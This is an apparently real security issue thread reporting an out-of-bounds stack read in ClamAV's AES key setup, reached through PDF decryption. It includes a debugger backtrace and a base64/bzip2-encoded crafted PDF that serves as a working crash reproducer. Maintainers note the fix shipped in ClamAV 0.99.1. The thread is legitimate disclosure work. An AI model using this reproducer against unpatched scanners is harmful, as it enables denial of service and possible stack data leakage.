### ISSUE TITLE
rijndaelSetupEncrypt OOB read via PDF decryption DoS

### ISSUE THREAD

**Issue by felixgr** [vrtadmin/clamav-devel#37]
rijndaelSetupEncrypt seems broken. It is called via rijndaelSetupDecrypt and aes_decrypt. The key is a stack unsigned char[16] from decrypt_any. However in rijndaelSetupEncrypt the key is indexed with offset 20 on line 744 of rijndael.c. Possibly this could be used to leak information from the stack but at least it is a Denial-of-Service.

```
Backtrace:
#0  rijndaelSetupEncrypt (rk=0x7ffffffecac0, key=0x7ffffffecf20 "@P\257\230\264\247\344oa\033\270Wr\ar\311=", keybits=40) at rijndael.c:717
#1  0x00000000008b5de6 in rijndaelSetupDecrypt (rk=0x7ffffffecac0, key=0x7ffffffecf20 "@P\257\230\264\247\344oa\033\270Wr\ar\311=", keybits=40) at rijndael.c:810
#2  0x00000000006a4281 in aes_decrypt (in=0x7ffff7e0e0df "0%PDF-2.\r-obj1 0 objFie/Standard/O(\24
4\340M۱3\313\020\334v8", length=0x7ffffffed8d0, q=0x61b00001f180 '\276' <repeats 200 times>..., key=0x7ffffffecf20 "@P\257\230\264\247\344oa\033\270Wr\ar\311=", key_n=5, has_iv=1) at pdf.c:703
```

Repro (base64 -d, bunzip2):

```
QlpoOTFBWSZTWdXmH58AAXV//9MGSrRD4/pFP2PbGH+z32AEIyBABMAoBKhIAC1CAghBQAH4AAOD
INGgDJpiGmgyDEMIGgNGJiNAAAcGQaNAGTTENNBkGIYQNAaMTEaAAATVUiEymCfqCeg0jTAj0Cek
9T0Riep6g2iPKeFNiaGnqhwZBo0AZNMQ00GQYhhA0BoxMRoAAPbGlGKVNuPwjFHUjSjgjjjfjrR1
Y+MdlS9cYeWO0rFhK24+yMUZI4Y1o1Y340Y1I0o6UasdyP6jMj6Y144Y042I8kcuN2PCTFGpK04y
xmJsxha0rWla8ascEZsbkZI9E/TBhgsKrtyvfHqleiMcrCjXjYjMjvSu3HfjJHKj4RzI2ozo2I+q
PXGKNeM+NKPlGfGOPVHPjnRjjZjCOpGZGKS2Y2o/aMsd6PyjsRhG5JeKN6OvGKN2MdG9H1xoR7I0
Y3KOXG5GfGdHRjHH3R047MbscEZsaEcEaEY4zY341IyR1o90YRhHPjijkjmRjjjjpRxRvRyR744o
2o4o5Iyx+MdiNuOGP+jjjxR8IyR4YyxtR8Y04+ca0bEZY+cZY24/8XckU4UJDV5h+fA=
```

**Comment by steve-morgan** [comment]
Tracking with https://bugzilla.clamav.net/show_bug.cgi?id=11444.

**Comment by felixgr** [comment]
Was there any progress? Can you add groebert at google.com to the ACL of the bugzilla bug?

**Comment by steve-morgan** [comment]
The fix for this issue shipped with ClamAV 0.99.1.
